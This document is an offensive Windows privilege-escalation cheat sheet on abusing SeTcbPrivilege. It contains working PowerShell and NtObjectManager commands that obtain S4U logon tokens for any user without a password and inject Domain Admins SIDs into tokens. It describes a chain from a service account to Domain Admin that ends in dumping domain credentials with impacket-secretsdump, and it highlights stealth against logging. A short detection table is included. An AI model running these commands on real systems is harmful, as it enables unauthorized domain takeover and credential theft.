Overview
SeTcbPrivilege (“Act as part of the operating system”) grants full trusted access to the LSA: create logon sessions for any user without their password, and inject arbitrary group SIDs into tokens. The LSA treats a holder as equivalent to SYSTEM.
Almost never assigned to non-SYSTEM accounts. When you find it on a service/user account (via GPO/secpol.msc), it is an immediate path to SYSTEM/Domain Admin.
Check if Enabled
whoami /priv | findstr /i "SeTcbPrivilege"
$code = @"
using System;
using System.Runtime.InteropServices;
public class P {
[DllImport("advapi32.dll", SetLastError=true)] public static extern bool OpenProcessToken(IntPtr p, uint a, out IntPtr t);
[DllImport("advapi32.dll", SetLastError=true)] public static extern bool LookupPrivilegeValue(string h, string n, out long l);
[DllImport("advapi32.dll", SetLastError=true)] public static extern bool AdjustTokenPrivileges(IntPtr t, bool d, ref TP s, int b, IntPtr p, IntPtr r);
[StructLayout(LayoutKind.Sequential)] public struct TP { public int Count; public long Luid; public int Attr; }
}
"@
Add-Type $code
$h=[IntPtr]::Zero; [P]::OpenProcessToken([Diagnostics.Process]::GetCurrentProcess().Handle,0x28,[ref]$h)
$luid=[long]0; [P]::LookupPrivilegeValue($null,"SeTcbPrivilege",[ref]$luid)
$tp=New-Object P+TP; $tp.Count=1; $tp.Luid=$luid; $tp.Attr=2
[P]::AdjustTokenPrivileges($h,$false,[ref]$tp,0,[IntPtr]::Zero,[IntPtr]::Zero)
S4U Logon — Token for Any User, No Password
S4U (Service-for-User) lets a trusted process get a logon token for any user without their password. MSV1_0_S4U_LOGON = local users, KERB_S4U_LOGON = domain users (needs DC reachable). Both require LsaRegisterLogonProcess, gated by SeTcbPrivilege.
NtObjectManager (Easiest)
James Forshaw’s module wraps all the LSA marshaling:
Install-Module NtObjectManager -Force
Import-Module NtObjectManager
# Local user
$token = Get-NtToken -S4U -User "Administrator" -Domain $env:COMPUTERNAME
# Domain user
$token = Get-NtToken -S4U -User "domainadmin" -Domain "CORP"
# Inject extra group (e.g. local Administrators)
$sid = Get-NtSid -KnownSid BuiltinAdministrators
$token = Get-NtToken -S4U -User "lowpriv" -Domain $env:COMPUTERNAME -AdditionalGroup $sid
New-Win32Process -Token $token -CommandLine "cmd.exe"
| Tool | Use |
|---|
| token-priv | Standalone SeTcb exploit binary (full S4U chain) |
| RunasCs | Run as another user, supports S4U |
| SharpToken | C# token manipulation |
Group SID Injection
LsaLogonUser’s LocalGroups parameter accepts a TOKEN_GROUPS the LSA adds with no validation — put any SID in a token. Inject Domain Admins (S-1-5-21-...-512) into a low-priv user’s token when S4U for a DA fails (DC unreachable):
$daSid = Get-NtSid -Sddl "S-1-5-21-XXXX-XXXX-XXXX-512"
$token = Get-NtToken -S4U -User $env:USERNAME -Domain $env:COMPUTERNAME -AdditionalGroup $daSid
New-Win32Process -Token $token -CommandLine "cmd.exe"
Injected SIDs do NOT appear in the 4624 logon event group list — stealthy. See Detection below.
Practical Chain — Service Account to Domain Admin
Service account with SeTcbPrivilege (vendor required it), not local admin:
Import-Module NtObjectManager
$token = Get-NtToken -S4U -User "da_admin" -Domain "CORP" # or SYSTEM / NT AUTHORITY
New-Win32Process -Token $token -CommandLine "cmd.exe"
# With the DA token — dump the domain
impacket-secretsdump corp.local/da_admin@DC01 -just-dc
Combine with Other Privileges
- + SeImpersonatePrivilege —
ImpersonateLoggedOnUser the S4U token in the current thread.
- + SeAssignPrimaryTokenPrivilege —
CreateProcessAsUser with the token as primary (real process, survives thread death).
- + SeCreateTokenPrivilege — enumerate sessions via LSA, forge an indistinguishable token. See SeCreateTokenPrivilege.
Detection
| Event ID | Indicator |
|---|
| 4611 | Trusted logon process registered with LSA — loudest signal; normally only winlogon.exe at boot |
| 4672 | Special privileges (SeTcb) on new logon |
| 4624 | Logon event — S4U shows as Type 3 (Network) |
Quick Reference
| Technique | Result |
|---|
| S4U logon (NtObjectManager) | Token for any local/domain user |
| Group SID injection | Arbitrary group membership (e.g. Domain Admins) |
| token-priv toolset | Standalone binary, no deps |
| + SeImpersonate / SeAssignPrimaryToken | Impersonate / spawn as the token |